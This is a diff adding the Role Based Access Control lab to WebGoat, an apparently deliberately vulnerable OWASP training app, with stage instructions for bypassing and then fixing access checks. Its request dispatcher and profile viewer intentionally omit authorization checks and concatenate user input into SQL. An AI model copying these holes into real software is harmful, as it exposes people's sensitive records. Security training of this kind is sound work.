diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
new file mode 100644
index 000000000..cdc541c22
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
@@ -0,0 +1,444 @@
+package org.owasp.webgoat.lessons.RoleBasedAccessControl;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.FindProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Login;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class RoleBasedAccessControl extends GoatHillsFinancial
+{
+    private final static Integer DEFAULT_RANKING = new Integer(125);
+
+    public final static String STAGE1 = "Bypass Business Layer Access Control";
+    
+    public final static String STAGE2 = "Add Business Layer Access Control";
+    
+    public final static String STAGE3 = "Bypass Data Layer Access Control";
+    
+    public final static String STAGE4 = "Add Data Layer Access Control";
+
+    protected void registerActions(String className) {
+    	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+    	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+    	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+    	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+    	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+    	// These actions are special in that they chain to other actions.
+    	registerAction(new Login(this, className, LOGIN_ACTION,
+    		getAction(LISTSTAFF_ACTION)));
+    	registerAction(new Logout(this, className, LOGOUT_ACTION,
+    		getAction(LOGIN_ACTION)));
+    	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
+    		getAction(VIEWPROFILE_ACTION)));
+    	registerAction(new UpdateProfile(this, className,
+    		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+    	registerAction(new DeleteProfile(this, className,
+    		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+    }
+
+    /**
+     *  Gets the category attribute of the CommandInjection object
+     *
+     * @return    The category value
+     */
+    public Category getDefaultCategory()
+    {
+	return Category.ACCESS_CONTROL;
+    }
+
+    /**
+     *  Gets the hints attribute of the DirectoryScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("Many sites attempt to restrict access to resources by role.");
+	hints
+		.add("Developers frequently make mistakes implementing this scheme.");
+	hints.add("Attempt combinations of users, roles, and resources.");
+
+	// Stage 1
+	hints
+		.add("How does the application know that the user selected the delete function?");
+
+	// Stage 2
+
+	// Stage 3
+	hints
+		.add("How does the application know that the user selected any particular employee to view?");
+
+	// Stage 4
+	hints
+		.add("Note that the contents of the staff listing change depending on who is logged in.");
+
+	return hints;
+    }
+
+    @Override
+	public String[] getStages() {
+    	if (getWebgoatContext().isCodingExercises())
+    		return new String[] {STAGE1, STAGE2, STAGE3, STAGE4};
+    	return new String[] {STAGE1, STAGE3};
+	}
+
+    /**
+     *  Gets the instructions attribute of the ParameterInjection object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "";
+
+	if (!getLessonTracker(s).getCompleted())
+	{
+		String stage = getStage(s);
+		if (STAGE1.equals(stage))
+	    {
+		    instructions = "Stage 1: Bypass Presentational Layer Access Control.<br>"
+			    + "As regular employee 'Tom', exploit weak access control to use the Delete function from the Staff List page.  "
+			    + "Verify that Tom's profile can be deleted.";
+	    }
+		else if (STAGE2.equals(stage))
+		{
+		    instructions = "Stage 2: Add Business Layer Access Control.<br>"
+			    + "Implement a fix to deny unauthorized access to the Delete function. "
+			    + "Repeat stage 1.  Verify that access to Delete is properly denied.";
+		}
+		else if (STAGE3.equals(stage))
+		{
+		    instructions = "Stage 3: Breaking Data Layer Access Control.<br>"
+			    + "As regular employee 'Tom', exploit weak access control to View another employee's profile. Verify the access.";
+		}
+		else if (STAGE4.equals(stage))
+		{
+		    instructions = "Stage 4: Add Data Layer Access Control.<br>"
+			    + "Implement a fix to deny unauthorized access to this data. "
+			    + "Repeat stage 3.  Verify that access to other employee's profiles is properly denied.";
+	    }
+	}
+
+	return instructions;
+    }
+
+    public void handleRequest(WebSession s)
+    {
+	// Here is where dispatching to the various action handlers happens.
+	// It would be a good place verify authorization to use an action.
+
+	//System.out.println("RoleBasedAccessControl.handleRequest()");
+	if (s.getLessonSession(this) == null)
+	    s.openLessonSession(this);
+
+	String requestedActionName = null;
+	try
+	{
+	    requestedActionName = s.getParser().getStringParameter("action");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // Let them eat login page.
+	    requestedActionName = LOGIN_ACTION;
+	}
+	//System.out.println("Requested lesson action: " + requestedActionName);
+
+	try
+	{
+	    LessonAction action = getAction(requestedActionName);
+	    if (action != null)
+	    {
+		//System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName());
+		if (!action.requiresAuthentication())
+		{
+		    // Access to Login does not require authentication.
+		    action.handleRequest(s);
+		}
+		else
+		{
+		    if (action.isAuthenticated(s))
+		    {
+			action.handleRequest(s);
+		    }
+		    else
+			throw new UnauthenticatedException();
+		}
+	    }
+	    else
+		setCurrentAction(s, ERROR_ACTION);
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    System.out.println("Missing parameter");
+	    pnfe.printStackTrace();
+	    setCurrentAction(s, ERROR_ACTION);
+	}
+	catch (ValidationException ve)
+	{
+	    System.out.println("Validation failed");
+	    ve.printStackTrace();
+	    setCurrentAction(s, ERROR_ACTION);
+	}
+	catch (UnauthenticatedException ue)
+	{
+	    s.setMessage("Login failed");
+	    System.out.println("Authentication failure");
+	    ue.printStackTrace();
+	}
+	catch (UnauthorizedException ue2)
+	{
+	    s.setMessage("You are not authorized to perform this function");
+
+		// Update lesson status if necessary.
+		String stage = getStage(s);
+		if (STAGE2.equals(stage))
+		{
+			try
+			{
+			if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) &&
+					!isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
+			{
+				setStageComplete(s, STAGE2);
+			}
+			} catch (ParameterNotFoundException pnfe)
+			{
+			pnfe.printStackTrace();
+			}
+		}
+		//System.out.println("isAuthorized() exit stage: " + getStage(s));
+		// Update lesson status if necessary.
+		if (STAGE4.equals(stage))
+		{
+			try
+			{
+			//System.out.println("Checking for stage 4 completion");
+			DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
+			int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "."
+					+ RoleBasedAccessControl.USER_ID));
+			int employeeId = s.getParser().getIntParameter(
+				RoleBasedAccessControl.EMPLOYEE_ID);
+
+			if (!action.isAuthorizedForEmployee(s, userId, employeeId))
+			{
+			    setStageComplete(s, STAGE4);
+			}
+			} catch (Exception e)
+			{
+				// swallow this - shouldn't happen inthe normal course
+				// e.printStackTrace();
+			}
+		}
+		
+	    System.out.println("Authorization failure");
+	    setCurrentAction(s, ERROR_ACTION);
+	    ue2.printStackTrace();
+	}
+	catch (Exception e)
+	{
+	    // All other errors send the user to the generic error page
+	    System.out.println("handleRequest() error");
+	    e.printStackTrace();
+	    setCurrentAction(s, ERROR_ACTION);
+	}
+
+	// All this does for this lesson is ensure that a non-null content exists.
+	setContent(new ElementContainer());
+    }
+
+
+    public void handleRequest_BACKUP(WebSession s)
+    {
+	// Here is where dispatching to the various action handlers happens.
+	// It would be a good place verify authorization to use an action.
+
+	//System.out.println("RoleBasedAccessControl.handleRequest()");
+	if (s.getLessonSession(this) == null)
+	    s.openLessonSession(this);
+
+	String requestedActionName = null;
+	try
+	{
+	    requestedActionName = s.getParser().getStringParameter("action");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // Let them eat login page.
+	    requestedActionName = LOGIN_ACTION;
+	}
+	//System.out.println("Requested lesson action: " + requestedActionName);
+
+	if (requestedActionName != null)
+	{
+	    try
+	    {
+		LessonAction action = getAction(requestedActionName);
+		if (action != null)
+		{
+		    //System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName());
+		    if (!action.requiresAuthentication())
+		    {
+			// Access to Login does not require authentication.
+			action.handleRequest(s);
+		    }
+		    else
+		    {
+			if (action.isAuthenticated(s))
+			{
+			    int userId = action.getUserId(s);
+			    if (action.isAuthorized(s, userId, action
+				    .getActionName()))
+			    {
+				action.handleRequest(s);
+			    }
+			    else
+			    {
+				throw new UnauthorizedException();
+			    }
+			}
+			else
+			    throw new UnauthenticatedException();
+		    }
+		}
+		else
+		    setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ParameterNotFoundException pnfe)
+	    {
+		System.out.println("Missing parameter");
+		pnfe.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ValidationException ve)
+	    {
+		System.out.println("Validation failed");
+		ve.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (UnauthenticatedException ue)
+	    {
+		s.setMessage("Login failed");
+		System.out.println("Authentication failure");
+		ue.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+		{
+	    	String stage = getStage(s);
+			// Update lesson status if necessary.
+			if (STAGE2.equals(stage))
+			{
+				try
+				{
+				if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) &&
+						!isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
+				{
+					setStageComplete(s, STAGE2);
+				}
+				} catch (ParameterNotFoundException pnfe)
+				{
+				pnfe.printStackTrace();
+				}
+			}
+			//System.out.println("isAuthorized() exit stage: " + getStage(s));
+			// Update lesson status if necessary.
+			if (STAGE4.equals(stage))
+			{
+				try
+				{
+				//System.out.println("Checking for stage 4 completion");
+				DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
+				int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "."
+						+ RoleBasedAccessControl.USER_ID));
+				int employeeId = s.getParser().getIntParameter(
+					RoleBasedAccessControl.EMPLOYEE_ID);
+
+				if (!action.isAuthorizedForEmployee(s, userId, employeeId))
+				{
+				    setStageComplete(s, STAGE4);
+				}
+				} catch (Exception e)
+				{
+					// swallow this - shouldn't happen inthe normal course
+					// e.printStackTrace();
+				}
+			}
+			
+		    s.setMessage("You are not authorized to perform this function");
+		    System.out.println("Authorization failure");
+		    setCurrentAction(s, ERROR_ACTION);
+		    ue2.printStackTrace();
+		}
+	    catch (Exception e)
+	    {
+		// All other errors send the user to the generic error page
+		System.out.println("handleRequest() error");
+		e.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	}
+
+	// All this does for this lesson is ensure that a non-null content exists.
+	setContent(new ElementContainer());
+    }
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the DirectoryScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "LAB: Role Based Access Control";
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
new file mode 100644
index 000000000..f5bddc3a0
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
@@ -0,0 +1,300 @@
+package org.owasp.webgoat.lessons.RoleBasedAccessControl;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class UpdateProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + RoleBasedAccessControl.USER_ID);
+
+	    int subjectId = s.getParser().getIntParameter(
+		    RoleBasedAccessControl.EMPLOYEE_ID, 0);
+
+	    String firstName = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.FIRST_NAME);
+	    String lastName = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.LAST_NAME);
+	    String ssn = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.SSN);
+	    String title = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.TITLE);
+	    String phone = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.PHONE_NUMBER);
+	    String address1 = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.ADDRESS1);
+	    String address2 = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.ADDRESS2);
+	    int manager = s.getParser().getIntParameter(
+		    RoleBasedAccessControl.MANAGER);
+	    String startDate = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.START_DATE);
+	    int salary = s.getParser().getIntParameter(
+		    RoleBasedAccessControl.SALARY);
+	    String ccn = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.CCN);
+	    int ccnLimit = s.getParser().getIntParameter(
+		    RoleBasedAccessControl.CCN_LIMIT);
+	    String disciplinaryActionDate = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.DISCIPLINARY_DATE);
+	    String disciplinaryActionNotes = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.DISCIPLINARY_NOTES);
+	    String personalDescription = s.getParser().getStringParameter(
+		    RoleBasedAccessControl.DESCRIPTION);
+
+	    Employee employee = new Employee(subjectId, firstName, lastName,
+		    ssn, title, phone, address1, address2, manager, startDate,
+		    salary, ccn, ccnLimit, disciplinaryActionDate,
+		    disciplinaryActionNotes, personalDescription);
+
+	    if (subjectId > 0)
+	    {
+		this.changeEmployeeProfile(s, userId, subjectId, employee);
+		setRequestAttribute(s, getLessonName() + "."
+			+ RoleBasedAccessControl.EMPLOYEE_ID, Integer
+			.toString(subjectId));
+	    }
+	    else
+		this.createEmployeeProfile(s, userId, employee);
+
+	    try
+	    {
+		chainedAction.handleRequest(s);
+	    }
+	    catch (UnauthenticatedException ue1)
+	    {
+		System.out.println("Internal server error");
+		ue1.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		System.out.println("Internal server error");
+		ue2.printStackTrace();
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return RoleBasedAccessControl.VIEWPROFILE_ACTION;
+    }
+
+
+    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+				+ " personal_description = ? WHERE userid = ?;";
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+
+			ps.setString(1, employee.getFirstName());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getPersonalDescription());
+			ps.setInt(13, subjectId);
+			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+
+    public void changeEmployeeProfile_BACKUP(WebSession s, int userId,
+	    int subjectId, Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+				+ " personal_description = ? WHERE userid = ?;";
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+
+			ps.setString(1, employee.getFirstName());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getPersonalDescription());
+			ps.setInt(13, subjectId);
+			ps.executeUpdate(query);
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+    protected int getNextUID(WebSession s)
+    {
+	int uid = -1;
+	try
+	{
+	    Statement statement = WebSession.getConnection(s).createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    ResultSet results = statement
+		    .executeQuery("select max(userid) as uid from employee");
+	    results.first();
+	    uid = results.getInt("uid");
+	}
+	catch (SQLException sqle)
+	{
+	    sqle.printStackTrace();
+	    s.setMessage("Error updating employee profile");
+	}
+	catch (ClassNotFoundException e)
+	{
+	    // TODO Auto-generated catch block
+	    e.printStackTrace();
+	}
+	return uid + 1;
+    }
+
+    public void createEmployeeProfile(WebSession s, int userId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+		    // FIXME: Cannot choose the id because we cannot guarantee uniqueness
+			int nextId = getNextUID(s);
+		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+
+	    //System.out.println("Query:  " + query);
+
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+			ps.setString(1, employee.getFirstName().toLowerCase());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getDisciplinaryActionDate());
+			ps.setString(13, employee.getDisciplinaryActionNotes());
+			ps.setString(14, employee.getPersonalDescription());
+
+			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+			sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+		    e.printStackTrace();
+	}
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
new file mode 100644
index 000000000..7ad8c8aad
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
@@ -0,0 +1,230 @@
+package org.owasp.webgoat.lessons.RoleBasedAccessControl;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class ViewProfile extends DefaultLessonAction
+{
+
+    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + RoleBasedAccessControl.USER_ID);
+	    int employeeId = -1;
+	    try
+	    {
+		// User selected employee
+		employeeId = s.getParser().getIntParameter(
+			RoleBasedAccessControl.EMPLOYEE_ID);
+	    }
+	    catch (ParameterNotFoundException e)
+	    {
+		// May be an internally selected employee
+		employeeId = getIntRequestAttribute(s, getLessonName() + "."
+			+ RoleBasedAccessControl.EMPLOYEE_ID);
+	    }
+
+	    Employee employee = getEmployeeProfile(s, userId, employeeId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee);
+	}
+	else
+	    throw new UnauthenticatedException();
+
+	updateLessonStatus(s);
+    }
+
+
+    private void updateLessonStatus(WebSession s)
+    {
+	// If the logged in user is not authorized to see the given employee's data, stage is complete.
+	try
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + RoleBasedAccessControl.USER_ID);
+	    int employeeId = s.getParser().getIntParameter(
+		    RoleBasedAccessControl.EMPLOYEE_ID);
+
+	    if (RoleBasedAccessControl.STAGE3.equals(getStage(s))
+		    && !isAuthorizedForEmployee(s, userId, employeeId))
+	    {
+		setStageComplete(s, RoleBasedAccessControl.STAGE3);
+	    }
+	}
+	catch (ParameterNotFoundException e)
+	{}
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return RoleBasedAccessControl.VIEWPROFILE_ACTION;
+    }
+
+
+    public Employee getEmployeeProfile(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = "
+		    + subjectUserId;
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	// Query the database to determine if the given employee is owned by the given user
+	// Query the database for the profile data of the given employee
+
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = "
+		    + subjectUserId;
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+}
